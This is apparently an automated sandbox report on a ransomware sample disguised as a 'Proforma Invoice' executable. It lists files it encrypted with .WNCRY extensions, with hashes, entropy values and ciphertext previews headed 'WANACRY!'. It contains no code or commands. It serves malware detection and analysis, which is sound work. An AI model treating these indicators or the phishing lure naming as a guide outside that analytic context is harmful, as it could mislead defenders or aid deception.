                                                          Preview:WANACRY!....Oy..V.f....*xILC..N$....u..K...Qq3_..Y..F]...Q.S.......PQ.f.h+5...N5..;.K.....L..)...2..c..[?*.L=.we.....j..EZ.......mal;'.jF.e.h.yb.....L.+.;....)S..u.a..g#.T.J1$a..x.....Z(..;./...........5...t.G#..W.....@0..=..+y.j.......>..]$.;... .8../N............[.LwR.@.!.P.F/.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999855684177184
                                                          Encrypted:true
                                                          SSDEEP:24576:Rwvs5QUfOYHba1iF0eQ0In2rdOj8DT3zHi0RuMId8ie2G:H5ZZFF0La9DT3zHi0EXCPD
                                                          MD5:2871DF3305924BF43FC104F5212D07C1
                                                          SHA1:592FAEBD14F472AEB04770E1963536044C844455
                                                          SHA-256:9729B65324A27C27C0E048307E45103F4A9DE39CE4C6CBB493E07618CEE83D6F
                                                          SHA-512:204F58653254B64C75BB08D4A6F0A0304E73BDB967F86ABCC9726178BC5C0C40FBDB6FE34FBB5257FD4F469A2725D0A8CD5320939E226F71187E4709D1236C63
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........glt:...........u...TR..q.N.?..UiN....Cs?..Az]...@..<\.....P......b.Y.......+.t..D...qE......M.. 4.....;'V...`+,.>Z...^1.(.."..G .......p...|..S.@b..F.....`%_..C2.}........E.k..Z/...\)e'J.E....6..`.'....Cv.Ww3.......J.2.D.....eJ.....^..............h.....W.=..C....].....b....|}4k..p..:...!.#.....7...f.....#T.U.i..`...Z.6..?%.'G.....|....`{,Z..im.....K......C....."...C...:..y......c._Z....!y_.R...'.p..xd#........6.6i.#X....+..%.\.....L..Vb...X.....Pe.\ve...Wm.prcR@......{le.QhS...Wz.V..p?..wT...i..0..m[9..{p..5..B|.r......`.my.*<.&.-...kD.b.z;....T..V.|E..A..Q.. .b...e.$.4.[..C.0.....>.-.C..J../S..eZw.g(...h..'W.O|=...At?) .^[>.q.....V.S......d.MU.MY"..w....b$.....9. j.....*j.b...R.....PC..<..#...>.X..$..^..Y...c&.^...../..I......Hr.L.....1.y.>jZ...62.W..`C..Z...z..{.u...9.G."{h../..~$.#.s{F.g.Oe.."L.d..........p.F.....I.+.D. .<.;..Sy....7.>s...H..c.*...y&......+. #.....eA.E.D......zdtx..f.:.2M....mpw....O.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999855684177184
                                                          Encrypted:true
                                                          SSDEEP:24576:Rwvs5QUfOYHba1iF0eQ0In2rdOj8DT3zHi0RuMId8ie2G:H5ZZFF0La9DT3zHi0EXCPD
                                                          MD5:2871DF3305924BF43FC104F5212D07C1
                                                          SHA1:592FAEBD14F472AEB04770E1963536044C844455
                                                          SHA-256:9729B65324A27C27C0E048307E45103F4A9DE39CE4C6CBB493E07618CEE83D6F
                                                          SHA-512:204F58653254B64C75BB08D4A6F0A0304E73BDB967F86ABCC9726178BC5C0C40FBDB6FE34FBB5257FD4F469A2725D0A8CD5320939E226F71187E4709D1236C63
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........glt:...........u...TR..q.N.?..UiN....Cs?..Az]...@..<\.....P......b.Y.......+.t..D...qE......M.. 4.....;'V...`+,.>Z...^1.(.."..G .......p...|..S.@b..F.....`%_..C2.}........E.k..Z/...\)e'J.E....6..`.'....Cv.Ww3.......J.2.D.....eJ.....^..............h.....W.=..C....].....b....|}4k..p..:...!.#.....7...f.....#T.U.i..`...Z.6..?%.'G.....|....`{,Z..im.....K......C....."...C...:..y......c._Z....!y_.R...'.p..xd#........6.6i.#X....+..%.\.....L..Vb...X.....Pe.\ve...Wm.prcR@......{le.QhS...Wz.V..p?..wT...i..0..m[9..{p..5..B|.r......`.my.*<.&.-...kD.b.z;....T..V.|E..A..Q.. .b...e.$.4.[..C.0.....>.-.C..J../S..eZw.g(...h..'W.O|=...At?) .^[>.q.....V.S......d.MU.MY"..w....b$.....9. j.....*j.b...R.....PC..<..#...>.X..$..^..Y...c&.^...../..I......Hr.L.....1.y.>jZ...62.W..`C..Z...z..{.u...9.G."{h../..~$.#.s{F.g.Oe.."L.d..........p.F.....I.+.D. .<.;..Sy....7.>s...H..c.*...y&......+. #.....eA.E.D......zdtx..f.:.2M....mpw....O.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2680
                                                          Entropy (8bit):7.90764841043664
                                                          Encrypted:false
                                                          SSDEEP:48:bkcMk01XcSJ34ormNnllZdgVDWx9Bm6e+MzvqUJFwgTJtyS5cDypGfBZknOSw:ocMkyX53/rmNll7gVSx9fe+4llTryecD
                                                          MD5:D10288ABAC79A0D5382AE788CF2BE971
                                                          SHA1:E795BE2F65A7DB1B7D4A0BCB1DCC57447824D0EC
                                                          SHA-256:38240E2DA3E8FCA1C1A71FB5174ADC89637D917D46344A61FD8D076647DF6D9C
                                                          SHA-512:5E618C44456E8E79215ED5353EA13580867A19C94A80F715644FD1B815D42D16EBDF469DAC94F24717BB63CB97E913759C14DEB8F8EF49889DCB4813A04D9A24
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....f..../e.qb..b.V...+..IK..E.N.4.P..8...7.........3...%.r..*.>-.^6\..'.$..z6.......|3f%7....A...S.d..."..c.f`/.y_.~3.....Y.].y..aX.R<.....yA.....0.5...X0M.m.....^.r..t.o.>z...-(..|qf....p>+....N!......l..-..b)...../B ...h.>.F..k.....X..nA.A...y.....Y............_cp.=..#3*......g..\n.2O!..0\..RA.H..(.45....h....y...n...;..#'.-T.\.<...q.;.l..(."..1.....I.9?..2.Dez.)C......`"mS..=...-...zu..#.O.6.E..vp..m..........|.....<..50..Z-.b\...{.....m.F."3...kw>.S..ud.g....g.=.m'.....j.."_j.H.i.a...p0$......Q....R.6Y..b.&.1.f.<bI.:..L.}.....R/...X..w....N.-.MpP......].7.....h.P.'#.D..k.+....N.a.j..P.[t..`.x.L.:9..}..!.`...`..*...v~..(...b.../.,.h.L.T9."..L..1bF.w.K`..*.Y, ..8ruZ.[h.ok..F..F)...hv....2t..>c....(.......bEB....X....v..e..<..;"..q-..5...,.....a,c......&......-.!i..?g8ZP.(f&'..."s...y.. .T....Y..0......#3pn..K.1.+....3.<..&i.GY2.............NY. ..Y.'..:AZ........sE......o8.[~.....O....../..R.U.N...p.^.=....aq..k.....#Eb....KG*h.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2680
                                                          Entropy (8bit):7.90764841043664
                                                          Encrypted:false
                                                          SSDEEP:48:bkcMk01XcSJ34ormNnllZdgVDWx9Bm6e+MzvqUJFwgTJtyS5cDypGfBZknOSw:ocMkyX53/rmNll7gVSx9fe+4llTryecD
                                                          MD5:D10288ABAC79A0D5382AE788CF2BE971
                                                          SHA1:E795BE2F65A7DB1B7D4A0BCB1DCC57447824D0EC
                                                          SHA-256:38240E2DA3E8FCA1C1A71FB5174ADC89637D917D46344A61FD8D076647DF6D9C
                                                          SHA-512:5E618C44456E8E79215ED5353EA13580867A19C94A80F715644FD1B815D42D16EBDF469DAC94F24717BB63CB97E913759C14DEB8F8EF49889DCB4813A04D9A24
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....f..../e.qb..b.V...+..IK..E.N.4.P..8...7.........3...%.r..*.>-.^6\..'.$..z6.......|3f%7....A...S.d..."..c.f`/.y_.~3.....Y.].y..aX.R<.....yA.....0.5...X0M.m.....^.r..t.o.>z...-(..|qf....p>+....N!......l..-..b)...../B ...h.>.F..k.....X..nA.A...y.....Y............_cp.=..#3*......g..\n.2O!..0\..RA.H..(.45....h....y...n...;..#'.-T.\.<...q.;.l..(."..1.....I.9?..2.Dez.)C......`"mS..=...-...zu..#.O.6.E..vp..m..........|.....<..50..Z-.b\...{.....m.F."3...kw>.S..ud.g....g.=.m'.....j.."_j.H.i.a...p0$......Q....R.6Y..b.&.1.f.<bI.:..L.}.....R/...X..w....N.-.MpP......].7.....h.P.'#.D..k.+....N.a.j..P.[t..`.x.L.:9..}..!.`...`..*...v~..(...b.../.,.h.L.T9."..L..1bF.w.K`..*.Y, ..8ruZ.[h.ok..F..F)...hv....2t..>c....(.......bEB....X....v..e..<..;"..q-..5...,.....a,c......&......-.!i..?g8ZP.(f&'..."s...y.. .T....Y..0......#3pn..K.1.+....3.<..&i.GY2.............NY. ..Y.'..:AZ........sE......o8.[~.....O....../..R.U.N...p.^.=....aq..k.....#Eb....KG*h.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\tinytile.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1912
                                                          Entropy (8bit):7.8974741084021645
                                                          Encrypted:false
                                                          SSDEEP:48:bkrDU98ksPjq9uz3GP1+rL+itv3vsxFPzX9TCOueI3hlsODBoXXl0LPYm4+XE:o/UqPLiuzy1+XFd0xRyeI3zsONa1yPRU
                                                          MD5:D38E41BB0FCF063C0BA30EA394EC89CE
                                                          SHA1:8E48602FD20A41CFC01860ADE158CB5F1EBCF153
                                                          SHA-256:910F79A14D7527C880D7458A82CF85ED805AD233D5632F741A3BD55C5013AB2A
                                                          SHA-512:C97BA63C34FFDD9314AD639CC6C318A924E15B44929EDA2C7A25D02B72ABE354CE262B213572953A531E76898C5DF6F7A2BE35EEC8E4C97F615D0B0D3F152346
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....s...A...-:[.~..?..fC<W-Cg*<...".Z...w>.A..V....QI0........h._.I>...lK.(.8@..o^->y.m&.....3w'.[..[%R.....P<.;.m...a...v^.P.>..^M..E....!.vF..Ra.R..R.-..?..........6.(B..^.L...D.....1..(&...H..Mc.(..q..R.A!....gg...X.*.....&9...iO..[.t.A........[.......y...6.v.0.Za..P.I..5N...N... ..p...r..aj.ajQ.!301..}...d.>~h.N.....<.R.vr....0U.,8x..&..\.e.....Ta..]b...b..R....q..56....6GB.._t..k:.qG.P.'..d.v96L&P.X......C.f..0.7._..<.GS.^...(.e.v.K..B$s,.[..!+@..U...q..m...`'B.|....Kf...-...*|j..$.V.m.....gv.z..........I.c..-.C.?..K[#i\.C..f=....n7.........J....Hr]./G.-..;...&....0....nv...o..cy.B.{1.L6.?..J...l.c..sq...,\E.....:.....R.{..G=.+. ...4.l4..7.H.d$...'X.Uj......;"..w..$.},.....-|I.l.D^b...7Y2....&.....D.k..m c.Z.)..qpw....N...G..R..3yD..m..WQ..^.q...-.-.w...{f.x..YB.[.b..2.]...........4..PE="..Dcy.fX...ma.......n. G...QP....Y.7.......2.>vy$../..Z./.........e..+L.>.F.P!.....s.......D..6m../.t4O...820>..LQ..'.-......].i,....q...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\tinytile.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1912
                                                          Entropy (8bit):7.8974741084021645
                                                          Encrypted:false
                                                          SSDEEP:48:bkrDU98ksPjq9uz3GP1+rL+itv3vsxFPzX9TCOueI3hlsODBoXXl0LPYm4+XE:o/UqPLiuzy1+XFd0xRyeI3zsONa1yPRU
                                                          MD5:D38E41BB0FCF063C0BA30EA394EC89CE
                                                          SHA1:8E48602FD20A41CFC01860ADE158CB5F1EBCF153
                                                          SHA-256:910F79A14D7527C880D7458A82CF85ED805AD233D5632F741A3BD55C5013AB2A
                                                          SHA-512:C97BA63C34FFDD9314AD639CC6C318A924E15B44929EDA2C7A25D02B72ABE354CE262B213572953A531E76898C5DF6F7A2BE35EEC8E4C97F615D0B0D3F152346
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....s...A...-:[.~..?..fC<W-Cg*<...".Z...w>.A..V....QI0........h._.I>...lK.(.8@..o^->y.m&.....3w'.[..[%R.....P<.;.m...a...v^.P.>..^M..E....!.vF..Ra.R..R.-..?..........6.(B..^.L...D.....1..(&...H..Mc.(..q..R.A!....gg...X.*.....&9...iO..[.t.A........[.......y...6.v.0.Za..P.I..5N...N... ..p...r..aj.ajQ.!301..}...d.>~h.N.....<.R.vr....0U.,8x..&..\.e.....Ta..]b...b..R....q..56....6GB.._t..k:.qG.P.'..d.v96L&P.X......C.f..0.7._..<.GS.^...(.e.v.K..B$s,.[..!+@..U...q..m...`'B.|....Kf...-...*|j..$.V.m.....gv.z..........I.c..-.C.?..K[#i\.C..f=....n7.........J....Hr]./G.-..;...&....0....nv...o..cy.B.{1.L6.?..J...l.c..sq...,\E.....:.....R.{..G=.+. ...4.l4..7.H.d$...'X.Uj......;"..w..$.},.....-|I.l.D^b...7Y2....&.....D.k..m c.Z.)..qpw....N...G..R..3yD..m..WQ..^.q...-.-.w...{f.x..YB.[.b..2.]...........4..PE="..Dcy.fX...ma.......n. G...QP....Y.7.......2.>vy$../..Z./.........e..+L.>.F.P!.....s.......D..6m../.t4O...820>..LQ..'.-......].i,....q...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2696
                                                          Entropy (8bit):7.929726783415007
                                                          Encrypted:false
                                                          SSDEEP:48:bkP1z3qgWHaA+lpjV6Ut0nbwZBE+XTQ78dWhdU53fO4KYinLnvQ+cl:oP1fvV6UtAbi878deu3fOBnnLvQl
                                                          MD5:CACCB8688BC0F398BACBC6AD24B569FB
                                                          SHA1:B6514A3450241F8C69F0F2422DD80F9134F68858
                                                          SHA-256:5AB04B21904C28908FC186028117F191585714A80001F43654420448FECE0916
                                                          SHA-512:DD3011799D154148D39D0BB2BDC2DBB57119CB6F17E1E599318909EA419FC47FD64C5034EBDDF7911F096E2B264DD51B4DBAA5102244ADBD96579611DBA0AA1B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........7..u.V.<.g ...T...pX.he..m.B.x.k..T.p..w......l...b..J..}{....,.~......O..ME.....=E.....W.p...Z..!.g0..|....N.#.Z..LY......o.$3..M.\...o..7gB.C...u1J.g..&.;E......%.....Q:......X....0i.#..;.....aX..!*h.YM...qd .....F...c..n....@.]..+.z....a........f..;....U.]..f..D..</......y[.>.O.}.l.!-W>.!?M....mX..W.......k..._...c3.IoY.t.nfZ....%.6...@.i7...(..&.-.oi...).T....7.x0o.........!..%rA..9G.....;............Yh.E...Ys`........[...Z...wW.X.KfY.....k.npL|.Z......z.@. T.....'.E...]..M]aQq..dP....CuIT=...$.....C..x#i...mAC.=3p...6..4y?.....H.N.-G.&!.(.eF..+..k...|..q...r...ZY[.(2..A..P....S.=.%Z..^....=.....P.WH..O_..D.P.f.,...9..#...R.......,.m../..P.vw..tx....R.lND....6h4.........il..;....^:Q..v.B......?+.Y5.....Zb.....w.4.B.._..MD.K.l..oI;K..+a..D..B......$......0...@U.G.-E..0.s.@.@..o....As....[#T.O.f.v.......ImmAq~.8JL.."G...?....e[.4..<...x.>...3.I.....i.3/..\._f.N./.@.\OYc.....Vf6...&...`.......n..$...Z.:wR....m.K;>

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2696
                                                          Entropy (8bit):7.929726783415007
                                                          Encrypted:false
                                                          SSDEEP:48:bkP1z3qgWHaA+lpjV6Ut0nbwZBE+XTQ78dWhdU53fO4KYinLnvQ+cl:oP1fvV6UtAbi878deu3fOBnnLvQl
                                                          MD5:CACCB8688BC0F398BACBC6AD24B569FB
                                                          SHA1:B6514A3450241F8C69F0F2422DD80F9134F68858
                                                          SHA-256:5AB04B21904C28908FC186028117F191585714A80001F43654420448FECE0916
                                                          SHA-512:DD3011799D154148D39D0BB2BDC2DBB57119CB6F17E1E599318909EA419FC47FD64C5034EBDDF7911F096E2B264DD51B4DBAA5102244ADBD96579611DBA0AA1B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........7..u.V.<.g ...T...pX.he..m.B.x.k..T.p..w......l...b..J..}{....,.~......O..ME.....=E.....W.p...Z..!.g0..|....N.#.Z..LY......o.$3..M.\...o..7gB.C...u1J.g..&.;E......%.....Q:......X....0i.#..;.....aX..!*h.YM...qd .....F...c..n....@.]..+.z....a........f..;....U.]..f..D..</......y[.>.O.}.l.!-W>.!?M....mX..W.......k..._...c3.IoY.t.nfZ....%.6...@.i7...(..&.-.oi...).T....7.x0o.........!..%rA..9G.....;............Yh.E...Ys`........[...Z...wW.X.KfY.....k.npL|.Z......z.@. T.....'.E...]..M]aQq..dP....CuIT=...$.....C..x#i...mAC.=3p...6..4y?.....H.N.-G.&!.(.eF..+..k...|..q...r...ZY[.(2..A..P....S.=.%Z..^....=.....P.WH..O_..D.P.f.,...9..#...R.......,.m../..P.vw..tx....R.lND....6h4.........il..;....^:Q..v.B......?+.Y5.....Zb.....w.4.B.._..MD.K.l..oI;K..+a..D..B......$......0...@U.G.-E..0.s.@.@..o....As....[#T.O.f.v.......ImmAq~.8JL.."G...?....e[.4..<...x.>...3.I.....i.3/..\._f.N./.@.\OYc.....Vf6...&...`.......n..$...Z.:wR....m.K;>

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\tinytile.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1864
                                                          Entropy (8bit):7.903903710028022
                                                          Encrypted:false
                                                          SSDEEP:48:bkXNc/dZOgMCXsqw5mILCg6ZhE+dnViYUznXXek6kHzDefy:oXNc1ZOgnsqw5mIL4Ki4Yy/+y
                                                          MD5:8311DC05F2CCEB90BEDB407CDE36C006
                                                          SHA1:CBBDF231D2F88AE5DB3DAE561939109978F33B01
                                                          SHA-256:4A094DA51AA4F7F03CF0BF70E83B7C067128A184D0E79F28CEB6C5FA6F4F6E5C
                                                          SHA-512:EFADD5C7F22BAEC6834C768833A0BF737AB2C537B36897B38BADCE7917A6603D423126A016EAACD087159EC5DB0921D6CB67C66DE814CE1FE945DDBCDF8C99EA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....m.j.y.b.X.Ov..@.HhT.}.D.{m..i.."a{u.MZ.-..@.D._[c...9;.............^....m52W9#...!.wK.m.iq.h.&A.'..o[; .P........%{3.w..z`.^.f.......@._.V..dQmzRG.h....Z...1.ESz.#.@}..........F..{.,..>z).....].B.l..O.....).7.E....q0..P...i........z..hf...-....J......).......X...H|?;.SP...2.+..'...<......~b.;.,D..P2...8.::.(.....vHHS.b*,.!..c....._.Dx..M?.d.V..w1t.ei....,......Tw....z..S.pca......~......Q.Ks$.o........I%>...V...\........T...#E...D.....]..I.].P......@..L..J2<...Ta0....-..M.Gb..@.Uv*Y....H&B..b.T.t.Y... 7.d.e......\..F....t.z.&a}E_.J.(../o...(..=....~..8&_\..y.....%.....5jO.a...`..I.E...}%.h....U.7..s^.....R[.zK._..9. ...`.9...q>.&..iFo5l.v:.?.U@C..n..2c\..]g.um^...liT...O..7Yy.>.Z.$I.....*t...9.$..^0....|.............C.a..eMp.....s.F.}..2.J.G......=.bM(.j[...$._....z.<....]..US..k....8.jO.......).'.. .h..f.....<.).U.5..}..J(U.}.<7V...1q/>...y\.K.PH)U.&..?.:N.vl.2...i.F.b#<..D..`3Q.S(U.d$...Jy3..<V..'.t......uD.{..=.0.u..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\tinytile.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1864
                                                          Entropy (8bit):7.903903710028022
                                                          Encrypted:false
                                                          SSDEEP:48:bkXNc/dZOgMCXsqw5mILCg6ZhE+dnViYUznXXek6kHzDefy:oXNc1ZOgnsqw5mIL4Ki4Yy/+y
                                                          MD5:8311DC05F2CCEB90BEDB407CDE36C006
                                                          SHA1:CBBDF231D2F88AE5DB3DAE561939109978F33B01
                                                          SHA-256:4A094DA51AA4F7F03CF0BF70E83B7C067128A184D0E79F28CEB6C5FA6F4F6E5C
                                                          SHA-512:EFADD5C7F22BAEC6834C768833A0BF737AB2C537B36897B38BADCE7917A6603D423126A016EAACD087159EC5DB0921D6CB67C66DE814CE1FE945DDBCDF8C99EA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....m.j.y.b.X.Ov..@.HhT.}.D.{m..i.."a{u.MZ.-..@.D._[c...9;.............^....m52W9#...!.wK.m.iq.h.&A.'..o[; .P........%{3.w..z`.^.f.......@._.V..dQmzRG.h....Z...1.ESz.#.@}..........F..{.,..>z).....].B.l..O.....).7.E....q0..P...i........z..hf...-....J......).......X...H|?;.SP...2.+..'...<......~b.;.,D..P2...8.::.(.....vHHS.b*,.!..c....._.Dx..M?.d.V..w1t.ei....,......Tw....z..S.pca......~......Q.Ks$.o........I%>...V...\........T...#E...D.....]..I.].P......@..L..J2<...Ta0....-..M.Gb..@.Uv*Y....H&B..b.T.t.Y... 7.d.e......\..F....t.z.&a}E_.J.(../o...(..=....~..8&_\..y.....%.....5jO.a...`..I.E...}%.h....U.7..s^.....R[.zK._..9. ...`.9...q>.&..iFo5l.v:.?.U@C..n..2c\..]g.um^...liT...O..7Yy.>.Z.$I.....*t...9.$..^0....|.............C.a..eMp.....s.F.}..2.J.G......=.bM(.j[...$._....z.<....]..US..k....8.jO.......).'.. .h..f.....<.).U.5..}..J(U.}.<7V...1q/>...y\.K.PH)U.&..?.:N.vl.2...i.F.b#<..D..`3Q.S(U.d$...Jy3..<V..'.t......uD.{..=.0.u..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1848
                                                          Entropy (8bit):7.911577303740036
                                                          Encrypted:false
                                                          SSDEEP:24:bkCLS0bYmQUUgLW+45/vhvkzl4PKRLSEWb8D2ibDFgqi6862m7ld9TqkLJ5fn18M:bklwYrt+LgvhvkGTIC0+47ljjL31LZZ
                                                          MD5:1382498246853DD53F003175D35603E8
                                                          SHA1:DC4C8128090F800B499D05DD5905E30846338249
                                                          SHA-256:4E62588C98B1BCD113E0BD166899900A144DF53B98F206468AF203F32C508FA2
                                                          SHA-512:EEB175F502CD0902B5168748A417924ED0F1CF4C395F462ACEA352A0081B86F76149AAB3E8C51F397EC7EA4B23974B6701DF0930E17456EC9D6D39EC9C2EF025
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....P.V.d...>...u....<Gr...,.../.n...\v^...@....{hR...."....p(}..S...h.2.....a.&..b.......pD..........}...C8....J...J)..g...A..~]D."(rsh[......1...T......W-..n.Oc...X..Q.t.......P...L.0.q-}...y....>..=..&J.z..._.[.!..C....k...7..Q%'.g...1.=................8......'.N....6|v.,.|}H..sB.#....@U"..,*..Rxm...[...C.x.R..V.....-.Y..........d.&.J.5.z....sm[...Y8.i9X..d.bm.......7..l..n...;....9 ....+...R..H......qRI..EM.{.%(A.ghp...7..0.... .ly..L...ol|....O.../.(....T}..R0..V.....6^.y.;.......co.rEF>.03...OO...I.@8R|N...p..XM.f..A........lq....!A?g1P..D.ux.1..N.G.....t...`j.....4....<J[............0<.M........@....hl.d?........[.g.U....w../_A.:..-......!... z...f......gI.v.....0..D.x........I..'h7wd.8.D?.D...T...@S.....p....6_..2V.....=.......^)U.g.....x..SA.UYl8@:.TS....^B.Fz...f........i.lm...aWV...... ..C4........k..BZ^9fy=N..k;..M....2.2@/y.2...l....1./>..........u..P!....1.?jK...^r..+..X.=.hF.3.........31.l.......u.=...0.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1848
                                                          Entropy (8bit):7.911577303740036
                                                          Encrypted:false
                                                          SSDEEP:24:bkCLS0bYmQUUgLW+45/vhvkzl4PKRLSEWb8D2ibDFgqi6862m7ld9TqkLJ5fn18M:bklwYrt+LgvhvkGTIC0+47ljjL31LZZ
                                                          MD5:1382498246853DD53F003175D35603E8
                                                          SHA1:DC4C8128090F800B499D05DD5905E30846338249
                                                          SHA-256:4E62588C98B1BCD113E0BD166899900A144DF53B98F206468AF203F32C508FA2
                                                          SHA-512:EEB175F502CD0902B5168748A417924ED0F1CF4C395F462ACEA352A0081B86F76149AAB3E8C51F397EC7EA4B23974B6701DF0930E17456EC9D6D39EC9C2EF025
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....P.V.d...>...u....<Gr...,.../.n...\v^...@....{hR...."....p(}..S...h.2.....a.&..b.......pD..........}...C8....J...J)..g...A..~]D."(rsh[......1...T......W-..n.Oc...X..Q.t.......P...L.0.q-}...y....>..=..&J.z..._.[.!..C....k...7..Q%'.g...1.=................8......'.N....6|v.,.|}H..sB.#....@U"..,*..Rxm...[...C.x.R..V.....-.Y..........d.&.J.5.z....sm[...Y8.i9X..d.bm.......7..l..n...;....9 ....+...R..H......qRI..EM.{.%(A.ghp...7..0.... .ly..L...ol|....O.../.(....T}..R0..V.....6^.y.;.......co.rEF>.03...OO...I.@8R|N...p..XM.f..A........lq....!A?g1P..D.ux.1..N.G.....t...`j.....4....<J[............0<.M........@....hl.d?........[.g.U....w../_A.:..-......!... z...f......gI.v.....0..D.x........I..'h7wd.8.D?.D...T...@S.....p....6_..2V.....=.......^)U.g.....x..SA.UYl8@:.TS....^B.Fz...f........i.lm...aWV...... ..C4........k..BZ^9fy=N..k;..M....2.2@/y.2...l....1./>..........u..P!....1.?jK...^r..+..X.=.hF.3.........31.l.......u.=...0.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\tinytile.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1400
                                                          Entropy (8bit):7.858733697729163
                                                          Encrypted:false
                                                          SSDEEP:24:bkojghEGKCuNYtX5hZg7eo/6UpJ0Of3NatdMJQNP9bTOd8XATaDP6H:bkThEfBYR5Dg7j/7Jd3ktdTNVbTu1+Da
                                                          MD5:3AA011D492FFC36B910938E1E7BC6BC8
                                                          SHA1:E7A345AAA70CA469072B3FB6BBE8ED2E643459C9
                                                          SHA-256:7704C5ED533CA576652C32FAB8D452E630810EBE3C04BE10C9D5B14CB5F977CB
                                                          SHA-512:78A38384AF6A379D4CB22AC91E8319CA25DCF5E904C29A06676FE6F68E1DC1F2A5DF8130E5810BEF7DF83E793D42E2053DD7E1FACA11455D7805396B58285E84
                                                          Malicious:false
                                                          Reputation:unknown
